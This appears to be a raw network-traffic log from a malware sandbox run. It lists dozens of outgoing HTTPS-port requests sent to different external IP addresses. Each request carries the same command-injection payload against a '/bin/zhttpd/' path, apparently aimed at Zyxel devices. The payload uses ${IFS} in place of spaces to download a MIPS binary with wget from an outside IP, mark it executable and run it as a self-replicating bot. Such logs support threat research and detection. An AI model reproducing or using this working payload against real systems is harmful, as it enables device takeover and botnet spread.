                                                  Jan 19, 2024 18:23:48.913151979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2725192.168.2.134213241.133.233.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913199902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2726192.168.2.1359546115.17.237.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913239956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2727192.168.2.134362692.241.59.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913290024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2728192.168.2.1356058203.249.144.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913332939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2729192.168.2.1348644219.110.138.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913376093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2730192.168.2.134069851.34.28.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913419962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2731192.168.2.1337122150.167.120.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913450003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2732192.168.2.134498066.205.91.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913503885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2733192.168.2.134213876.164.250.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913556099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2734192.168.2.133939070.224.155.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913588047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2735192.168.2.135377423.69.253.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913631916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2736192.168.2.135580298.240.186.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913674116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2737192.168.2.135579879.98.214.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913712978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2738192.168.2.1358502142.160.247.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913746119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2739192.168.2.135273054.219.213.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913799047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2740192.168.2.135324484.120.34.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913827896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2741192.168.2.135553014.152.132.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913883924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2742192.168.2.1337950182.6.70.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913918018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2743192.168.2.136017096.239.222.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913948059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2744192.168.2.1339542146.174.58.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914011955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2745192.168.2.134753427.1.72.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914047956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2746192.168.2.134387491.119.72.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914071083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2747192.168.2.1346190219.219.64.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914100885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2748192.168.2.134456432.242.249.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914151907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2749192.168.2.133874243.212.160.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914191008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2750192.168.2.1344438137.138.217.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914226055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2751192.168.2.135419480.78.248.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914274931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2752192.168.2.133318474.113.180.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914309978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2753192.168.2.1358348218.37.113.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914351940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2754192.168.2.133282253.208.2.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914386034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2755192.168.2.1336592137.135.52.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914427042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2756192.168.2.1336004192.103.112.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914457083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2757192.168.2.134072458.35.248.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914503098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2758192.168.2.1341554153.93.203.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914536953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2759192.168.2.135127277.232.79.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914586067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2760192.168.2.134041063.0.143.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914607048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2761192.168.2.1353410154.174.63.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914643049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2762192.168.2.134461836.196.146.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914695024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2763192.168.2.1351432153.185.149.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914732933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2764192.168.2.1357216151.157.35.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914760113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2765192.168.2.1333600170.215.236.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914808989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2766192.168.2.1351582211.19.115.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914860010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2767192.168.2.1347048153.69.222.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914891958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2768192.168.2.1341434143.192.151.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914932966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2769192.168.2.1339788144.244.108.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.914963961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2770192.168.2.133282014.151.227.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915003061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2771192.168.2.1333780147.178.235.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915045977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2772192.168.2.1334356183.111.106.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915096045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2773192.168.2.134733425.137.10.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915117979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2774192.168.2.134288882.132.243.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915175915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2775192.168.2.1353860145.13.88.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915222883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2776192.168.2.1334804125.8.32.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915241003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2777192.168.2.134333466.183.8.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915283918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2778192.168.2.133632620.39.66.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915328979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2779192.168.2.1342328210.212.119.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915369987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2780192.168.2.1335358157.21.101.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915405989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2781192.168.2.133977831.64.31.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915442944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2782192.168.2.1345306111.184.14.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915474892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2783192.168.2.135497058.176.69.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915524960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2784192.168.2.1350720113.146.17.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915561914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2785192.168.2.1354584155.183.166.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915605068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2786192.168.2.135645076.176.125.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.915640116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2787192.168.2.1345620163.224.121.4443
                                                  TimestampBytes transferredDirectionData
